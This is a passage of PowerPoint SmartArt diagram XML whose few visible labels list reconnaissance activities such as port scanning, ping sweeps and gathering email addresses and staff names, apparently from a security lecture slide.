          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{70B4C770-9B74-413D-85D1-D32EA79EC61B}" type="parTrans" cxnId="{CDC023BF-6DF1-425C-8469-243B9B48A0AD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CCF63F34-4DD6-48E2-ACCE-CEF2C6B8C3AB}" type="sibTrans" cxnId="{CDC023BF-6DF1-425C-8469-243B9B48A0AD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8D3C5B04-B076-4602-AE22-9B0B0E0750F5}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-IN" sz="1050" dirty="0"/>
            <a:t>email addresses, usernames, social networks,</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D69863C7-7388-4EF6-BB84-8AD412A6787C}" type="parTrans" cxnId="{5503BFB3-CA89-4F05-9150-8122B355F653}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{161BF14B-2B42-402D-BF34-69B7E1301635}" type="sibTrans" cxnId="{5503BFB3-CA89-4F05-9150-8122B355F653}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B7943ABC-8F53-4535-826F-36AD42C88B92}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-IN" sz="1050" dirty="0"/>
            <a:t>Ping sweeps, port scanning, reverse DNS, packet sniffing</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3B5430B7-C318-4543-8AF0-27FF27BA05D6}" type="parTrans" cxnId="{A011CE82-E138-4CA3-B2A9-B8F61374134D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{64AB4D5C-77E1-4079-AE05-5F7E142A6AC5}" type="sibTrans" cxnId="{A011CE82-E138-4CA3-B2A9-B8F61374134D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0A9A3BFB-134E-4B38-957C-70A9147D5B33}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-IN" sz="1050" b="1" dirty="0"/>
            <a:t>Personnel, systems, or technologies</a:t>
          </a:r>
          <a:endParaRPr lang="en-IN" sz="1050" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{20FF080C-A126-4ECA-8B12-62D609C41E78}" type="parTrans" cxnId="{28BD7C35-7077-4FD7-86CD-64B1C7F2FAB1}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{184F5426-1058-4A09-973A-B9050CD97456}" type="sibTrans" cxnId="{28BD7C35-7077-4FD7-86CD-64B1C7F2FAB1}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{47A02477-3009-4372-B1C4-79E00207FB59}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-IN" sz="1050" dirty="0"/>
            <a:t>Get subdomains, people’s names</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{89CCEDC5-063D-490C-9AF5-B1F4D01E43B7}" type="parTrans" cxnId="{B0498887-A355-44E1-AEEE-3BE1D9E46A98}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CAC81838-07D4-4BBF-A542-0C4E1F3A7966}" type="sibTrans" cxnId="{B0498887-A355-44E1-AEEE-3BE1D9E46A98}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9050D786-B7E9-4389-8329-B22FBEE4F5B6}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-IN" sz="1050" b="1" dirty="0"/>
            <a:t>positions, technologies, email addresses</a:t>
          </a:r>
          <a:endParaRPr lang="en-IN" sz="1050" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5EBA01C7-28C9-4E4F-95CC-437A329D9788}" type="parTrans" cxnId="{DE1F007D-F8E5-4BAF-A89A-B03E8FA81BCF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{27672909-531E-49F8-A845-96230A616436}" type="sibTrans" cxnId="{DE1F007D-F8E5-4BAF-A89A-B03E8FA81BCF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D817E859-0F96-4E9A-A0E9-7C6D17626E50}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-IN" sz="1050" b="1" dirty="0"/>
            <a:t>Get physical access </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="1050" dirty="0"/>
            <a:t>or </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="1050" b="1" dirty="0"/>
            <a:t>pictures </a:t>
          </a:r>
          <a:endParaRPr lang="en-IN" sz="1050" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AD792412-2ECE-4E39-97E5-A92B7C964E7F}" type="parTrans" cxnId="{BB5A6266-9F47-42F2-B670-AFC6DF458CEE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C0C9AFA3-1528-4A21-9A89-41966FF112D8}" type="sibTrans" cxnId="{BB5A6266-9F47-42F2-B670-AFC6DF458CEE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{877EBD58-468B-4202-9274-3E92B40FDC6C}" type="pres">
      <dgm:prSet presAssocID="{DE0FB4FD-9E5A-4A6A-A56B-712C89D3355D}" presName="hierChild1" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:chPref val="1"/>
          <dgm:dir/>
          <dgm:animOne val="branch"/>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F8689D94-48F6-4DEB-85BE-F916D617A8E3}" type="pres">
      <dgm:prSet presAssocID="{31523E9E-8D8D-45B8-A485-EDC5EF938033}" presName="hierRoot1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{54DE7BDA-428B-4F80-B7D3-45F33EB105EA}" type="pres">
      <dgm:prSet presAssocID="{31523E9E-8D8D-45B8-A485-EDC5EF938033}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C20DE61E-B137-43C4-9AC6-B1F389F6D8C5}" type="pres">
      <dgm:prSet presAssocID="{31523E9E-8D8D-45B8-A485-EDC5EF938033}" presName="background" presStyleLbl="node0" presStyleIdx="0" presStyleCnt="1"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{DB8446FB-273F-4612-B1B4-E5FD4F2E60AE}" type="pres">
      <dgm:prSet presAssocID="{31523E9E-8D8D-45B8-A485-EDC5EF938033}" presName="text" presStyleLbl="fgAcc0" presStyleIdx="0" presStyleCnt="1" custScaleX="390716" custScaleY="92616">
        <dgm:presLayoutVars>
          <dgm:chPref val="3"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{83F56543-F67C-49FE-A5A1-8D10A3D078F8}" type="pres">
      <dgm:prSet presAssocID="{31523E9E-8D8D-45B8-A485-EDC5EF938033}" presName="hierChild2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{70806D22-1E26-407D-B206-9DF6B843E845}" type="pres">
      <dgm:prSet presAssocID="{BB45D3DE-AD65-46CB-B99E-678BE3B069DC}" presName="Name10" presStyleLbl="parChTrans1D2" presStyleIdx="0" presStyleCnt="7"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{909DCC9B-7504-44A4-B376-2F39CD5C6A79}" type="pres">
      <dgm:prSet presAssocID="{94C97DD6-5DB9-4BC9-9682-96520B482485}" presName="hierRoot2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B94B7600-B3DC-4572-A9ED-D7A678818189}" type="pres">
      <dgm:prSet presAssocID="{94C97DD6-5DB9-4BC9-9682-96520B482485}" presName="composite2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{AF9E4781-CB48-4A2F-BF9B-0E6D29BBE751}" type="pres">
      <dgm:prSet presAssocID="{94C97DD6-5DB9-4BC9-9682-96520B482485}" presName="background2" presStyleLbl="node2" presStyleIdx="0" presStyleCnt="7"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{EA4E23FD-E1A8-4AF9-B34B-F40CA144A049}" type="pres">
      <dgm:prSet presAssocID="{94C97DD6-5DB9-4BC9-9682-96520B482485}" presName="text2" presStyleLbl="fgAcc2" presStyleIdx="0" presStyleCnt="7" custScaleX="142319" custScaleY="242551">
        <dgm:presLayoutVars>
          <dgm:chPref val="3"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7B78625B-8980-4D5A-AD83-47825057FD4B}" type="pres">
      <dgm:prSet presAssocID="{94C97DD6-5DB9-4BC9-9682-96520B482485}" presName="hierChild3" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0D89A69C-F564-4FB2-BBE8-CDFA7D72C1D3}" type="pres">
      <dgm:prSet presAssocID="{20FF080C-A126-4ECA-8B12-62D609C41E78}" presName="Name17" presStyleLbl="parChTrans1D3" presStyleIdx="0" presStyleCnt="6"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{9AFB0BE0-DEDA-4C81-A93E-FADE31CD7538}" type="pres">
      <dgm:prSet presAssocID="{0A9A3BFB-134E-4B38-957C-70A9147D5B33}" presName="hierRoot3" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{394186A1-F49C-4644-BC51-C1B64BA2EF3B}" type="pres">
      <dgm:prSet presAssocID="{0A9A3BFB-134E-4B38-957C-70A9147D5B33}" presName="composite3" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{9439554D-EB26-4571-84E0-75AAB095BB8C}" type="pres">
      <dgm:prSet presAssocID="{0A9A3BFB-134E-4B38-957C-70A9147D5B33}" presName="background3" presStyleLbl="node3" presStyleIdx="0" presStyleCnt="6"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{20DA8C97-9A43-4200-87C6-2560ED75E059}" type="pres">
      <dgm:prSet presAssocID="{0A9A3BFB-134E-4B38-957C-70A9147D5B33}" presName="text3" presStyleLbl="fgAcc3" presStyleIdx="0" presStyleCnt="6" custScaleX="145156" custScaleY="353008">
        <dgm:presLayoutVars>
          <dgm:chPref val="3"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{74B61FBB-D461-4288-AD0E-E2B1A3B93D73}" type="pres">
      <dgm:prSet presAssocID="{0A9A3BFB-134E-4B38-957C-70A9147D5B33}" presName="hierChild4" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0DCBBC2F-D1BA-4925-9D7E-91BBF1B3B064}" type="pres">
      <dgm:prSet presAssocID="{14296F04-68A3-4AFD-BFD4-DB038D446DFE}" presName="Name10" presStyleLbl="parChTrans1D2" presStyleIdx="1" presStyleCnt="7"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A915DCC0-036E-4601-99D5-0AADDD97B332}" type="pres">
      <dgm:prSet presAssocID="{15F5A2E2-7CF0-473D-89D4-55DDEAB866F5}" presName="hierRoot2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F93CD776-36A7-41CB-94A1-4211CA5C412C}" type="pres">
      <dgm:prSet presAssocID="{15F5A2E2-7CF0-473D-89D4-55DDEAB866F5}" presName="composite2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0226257C-9BD6-4B02-96F3-DFDF3982C092}" type="pres">
      <dgm:prSet presAssocID="{15F5A2E2-7CF0-473D-89D4-55DDEAB866F5}" presName="background2" presStyleLbl="node2" presStyleIdx="1" presStyleCnt="7"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{596DD3C4-2D65-46D6-BA7B-64F530A9E24F}" type="pres">
      <dgm:prSet presAssocID="{15F5A2E2-7CF0-473D-89D4-55DDEAB866F5}" presName="text2" presStyleLbl="fgAcc2" presStyleIdx="1" presStyleCnt="7" custScaleX="173783" custScaleY="242551">
        <dgm:presLayoutVars>
          <dgm:chPref val="3"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{42BC5A39-9AC4-44B9-ACEB-C247540F9548}" type="pres">
      <dgm:prSet presAssocID="{15F5A2E2-7CF0-473D-89D4-55DDEAB866F5}" presName="hierChild3" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7E9808E7-0333-435F-B99D-EC56A290B8FE}" type="pres">
      <dgm:prSet presAssocID="{89CCEDC5-063D-490C-9AF5-B1F4D01E43B7}" presName="Name17" presStyleLbl="parChTrans1D3" presStyleIdx="1" presStyleCnt="6"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{398E2CFD-1B01-421E-A5C5-C7A1BD26EF7F}" type="pres">
      <dgm:prSet presAssocID="{47A02477-3009-4372-B1C4-79E00207FB59}" presName="hierRoot3" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{14DAC25D-EB3B-48B7-B901-825628E1EAA6}" type="pres">
      <dgm:prSet presAssocID="{47A02477-3009-4372-B1C4-79E00207FB59}" presName="composite3" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{AFB630DB-2579-4116-82A4-D0699D31578D}" type="pres">
      <dgm:prSet presAssocID="{47A02477-3009-4372-B1C4-79E00207FB59}" presName="background3" presStyleLbl="node3" presStyleIdx="1" presStyleCnt="6"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{12553BCC-1A32-4AE9-A7EA-E0C52C802D02}" type="pres">
      <dgm:prSet presAssocID="{47A02477-3009-4372-B1C4-79E00207FB59}" presName="text3" presStyleLbl="fgAcc3" presStyleIdx="1" presStyleCnt="6" custScaleX="138201" custScaleY="328588" custLinFactNeighborX="29787">
        <dgm:presLayoutVars>
          <dgm:chPref val="3"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{73F8B581-C1EE-49E0-B9F3-FDB56ECCD8A9}" type="pres">
      <dgm:prSet presAssocID="{47A02477-3009-4372-B1C4-79E00207FB59}" presName="hierChild4" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2A133F9A-C222-485C-A8F5-3DFBDBE375B4}" type="pres">
      <dgm:prSet presAssocID="{B772E103-9F04-4837-B406-B44E63E8D6F9}" presName="Name10" presStyleLbl="parChTrans1D2" presStyleIdx="2" presStyleCnt="7"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D9644BFD-6C72-479F-986E-328315DE5FF6}" type="pres">
      <dgm:prSet presAssocID="{9611B807-A7C5-413C-93B9-55370D02C8CB}" presName="hierRoot2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{36A30837-3FE9-4044-B76B-E856C1F04F43}" type="pres">
      <dgm:prSet presAssocID="{9611B807-A7C5-413C-93B9-55370D02C8CB}" presName="composite2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{386703CA-02B1-4845-9975-305C2F789F2D}" type="pres">
      <dgm:prSet presAssocID="{9611B807-A7C5-413C-93B9-55370D02C8CB}" presName="background2" presStyleLbl="node2" presStyleIdx="2" presStyleCnt="7"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6A04A5CD-8139-4EF6-A9AD-0F1978975A6D}" type="pres">
      <dgm:prSet presAssocID="{9611B807-A7C5-413C-93B9-55370D02C8CB}" presName="text2" presStyleLbl="fgAcc2" presStyleIdx="2" presStyleCnt="7" custScaleX="135826" custScaleY="242551" custLinFactNeighborX="23237">
        <dgm:presLayoutVars>
          <dgm:chPref val="3"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C8E9CB0B-6B8E-4E56-B55D-4BAC6E170AF9}" type="pres">
      <dgm:prSet presAssocID="{9611B807-A7C5-413C-93B9-55370D02C8CB}" presName="hierChild3" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{BC3A9901-662D-431F-810B-1BA004F3C569}" type="pres">
      <dgm:prSet presAssocID="{5EBA01C7-28C9-4E4F-95CC-437A329D9788}" presName="Name17" presStyleLbl="parChTrans1D3" presStyleIdx="2" presStyleCnt="6"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4233B1D2-439E-4C75-A24C-4F08DEFFA23D}" type="pres">
      <dgm:prSet presAssocID="{9050D786-B7E9-4389-8329-B22FBEE4F5B6}" presName="hierRoot3" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{793B84C6-8C76-4E7D-9501-C7DBDF284E37}" type="pres">
      <dgm:prSet presAssocID="{9050D786-B7E9-4389-8329-B22FBEE4F5B6}" presName="composite3" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{83CC19A4-4CF7-4528-A471-AA1579263EE7}" type="pres">
      <dgm:prSet presAssocID="{9050D786-B7E9-4389-8329-B22FBEE4F5B6}" presName="background3" presStyleLbl="node3" presStyleIdx="2" presStyleCnt="6"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7AD0083B-4359-4415-97B7-23E903627ADF}" type="pres">
      <dgm:prSet presAssocID="{9050D786-B7E9-4389-8329-B22FBEE4F5B6}" presName="text3" presStyleLbl="fgAcc3" presStyleIdx="2" presStyleCnt="6" custScaleX="160287" custScaleY="360939" custLinFactNeighborX="48276">
        <dgm:presLayoutVars>
          <dgm:chPref val="3"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A932187D-B408-4413-AB5E-9E8E29003422}" type="pres">
      <dgm:prSet presAssocID="{9050D786-B7E9-4389-8329-B22FBEE4F5B6}" presName="hierChild4" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1D89D9BC-CD35-49DB-9548-716E331C0105}" type="pres">
      <dgm:prSet presAssocID="{D46CF4A9-7CF6-4D71-B29A-2BFABE50F9F8}" presName="Name10" presStyleLbl="parChTrans1D2" presStyleIdx="3" presStyleCnt="7"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{36782983-FC3E-4863-BC1C-0E9885B1279F}" type="pres">
      <dgm:prSet presAssocID="{5E035DE4-2C61-41A3-88CB-FF7A5FB1B7EE}" presName="hierRoot2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1E7D99DE-1727-49EE-B272-342DFB5E86EB}" type="pres">
      <dgm:prSet presAssocID="{5E035DE4-2C61-41A3-88CB-FF7A5FB1B7EE}" presName="composite2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{96FA91CF-B4A4-45FD-839B-CB09457C644A}" type="pres">
      <dgm:prSet presAssocID="{5E035DE4-2C61-41A3-88CB-FF7A5FB1B7EE}" presName="background2" presStyleLbl="node2" presStyleIdx="3" presStyleCnt="7"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{9E264CAF-0386-4134-AFB2-8464FF9D86ED}" type="pres">
      <dgm:prSet presAssocID="{5E035DE4-2C61-41A3-88CB-FF7A5FB1B7EE}" presName="text2" presStyleLbl="fgAcc2" presStyleIdx="3" presStyleCnt="7" custScaleX="141447" custScaleY="242551" custLinFactNeighborX="-167">
        <dgm:presLayoutVars>
          <dgm:chPref val="3"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C5E1E5D0-E42D-4917-9051-273FBBC6596D}" type="pres">
      <dgm:prSet presAssocID="{5E035DE4-2C61-41A3-88CB-FF7A5FB1B7EE}" presName="hierChild3" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{55BBE2A1-008E-44CB-954E-34494C67F476}" type="pres">
      <dgm:prSet presAssocID="{D69863C7-7388-4EF6-BB84-8AD412A6787C}" presName="Name17" presStyleLbl="parChTrans1D3" presStyleIdx="3" presStyleCnt="6"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2A0B0B2B-7CD0-474A-8A61-3ED61A595DE7}" type="pres">
      <dgm:prSet presAssocID="{8D3C5B04-B076-4602-AE22-9B0B0E0750F5}" presName="hierRoot3" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7BD141F5-69E7-4A68-93A2-08F91E153991}" type="pres">
      <dgm:prSet presAssocID="{8D3C5B04-B076-4602-AE22-9B0B0E0750F5}" presName="composite3" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{BE6491EB-645A-474B-BDEE-5B4CD0315E7D}" type="pres">
      <dgm:prSet presAssocID="{8D3C5B04-B076-4602-AE22-9B0B0E0750F5}" presName="background3" presStyleLbl="node3" presStyleIdx="3" presStyleCnt="6"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{CE7FD50D-CA86-4FF7-AF22-D41AC5382A14}" type="pres">
      <dgm:prSet presAssocID="{8D3C5B04-B076-4602-AE22-9B0B0E0750F5}" presName="text3" presStyleLbl="fgAcc3" presStyleIdx="3" presStyleCnt="6" custScaleX="216746" custScaleY="329234" custLinFactNeighborX="44323">
        <dgm:presLayoutVars>
          <dgm:chPref val="3"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4B44F241-D617-45E2-8814-067C338826DD}" type="pres">
      <dgm:prSet presAssocID="{8D3C5B04-B076-4602-AE22-9B0B0E0750F5}" presName="hierChild4" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{25744467-C5FD-4089-9FA9-2F7A3827A434}" type="pres">
      <dgm:prSet presAssocID="{8D582FB3-F4BD-415A-A223-0878376ABCA4}" presName="Name10" presStyleLbl="parChTrans1D2" presStyleIdx="4" presStyleCnt="7"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{AD90B179-8B51-4A55-848F-FB9FA8A6541D}" type="pres">
      <dgm:prSet presAssocID="{17EB77E6-C1BC-460B-BA32-A9FD9BFFEA0F}" presName="hierRoot2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{09EE74B1-BFD9-4ECA-8840-259815165E6B}" type="pres">
      <dgm:prSet presAssocID="{17EB77E6-C1BC-460B-BA32-A9FD9BFFEA0F}" presName="composite2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{171DAE58-2C2C-4F04-AE47-1E28181FB53D}" type="pres">
      <dgm:prSet presAssocID="{17EB77E6-C1BC-460B-BA32-A9FD9BFFEA0F}" presName="background2" presStyleLbl="node2" presStyleIdx="4" presStyleCnt="7"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{EB0E4A42-D81E-40EA-94F1-55A2AB8A7094}" type="pres">
      <dgm:prSet presAssocID="{17EB77E6-C1BC-460B-BA32-A9FD9BFFEA0F}" presName="text2" presStyleLbl="fgAcc2" presStyleIdx="4" presStyleCnt="7" custScaleX="166831" custScaleY="242551" custLinFactNeighborX="10798" custLinFactNeighborY="-1455">
        <dgm:presLayoutVars>
          <dgm:chPref val="3"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{25C307E9-5919-4E5E-B99F-720C80BE29F3}" type="pres">
      <dgm:prSet presAssocID="{17EB77E6-C1BC-460B-BA32-A9FD9BFFEA0F}" presName="hierChild3" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{9DB4C5C6-9E1D-483E-9FDD-81AC11A58E6E}" type="pres">
      <dgm:prSet presAssocID="{3B5430B7-C318-4543-8AF0-27FF27BA05D6}" presName="Name17" presStyleLbl="parChTrans1D3" presStyleIdx="4" presStyleCnt="6"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{688C7362-CB43-4B5F-B598-23404D72B4F5}" type="pres">
      <dgm:prSet presAssocID="{B7943ABC-8F53-4535-826F-36AD42C88B92}" presName="hierRoot3" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F0AD2B1D-2348-4208-ACAD-2A6072F7427C}" type="pres">
      <dgm:prSet presAssocID="{B7943ABC-8F53-4535-826F-36AD42C88B92}" presName="composite3" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D11AA620-CF60-45CF-A165-27C7484EE28E}" type="pres">
      <dgm:prSet presAssocID="{B7943ABC-8F53-4535-826F-36AD42C88B92}" presName="background3" presStyleLbl="node3" presStyleIdx="4" presStyleCnt="6"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{50D64E23-3BB8-4104-B7CA-AD2542641979}" type="pres">
      <dgm:prSet presAssocID="{B7943ABC-8F53-4535-826F-36AD42C88B92}" presName="text3" presStyleLbl="fgAcc3" presStyleIdx="4" presStyleCnt="6" custScaleX="194058" custScaleY="326375" custLinFactNeighborX="62217" custLinFactNeighborY="6221">
        <dgm:presLayoutVars>
          <dgm:chPref val="3"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{970EEA69-54FF-4E1C-9F50-BA23F591EE3A}" type="pres">
      <dgm:prSet presAssocID="{B7943ABC-8F53-4535-826F-36AD42C88B92}" presName="hierChild4" presStyleCnt="0"/>
      <dgm:spPr/>
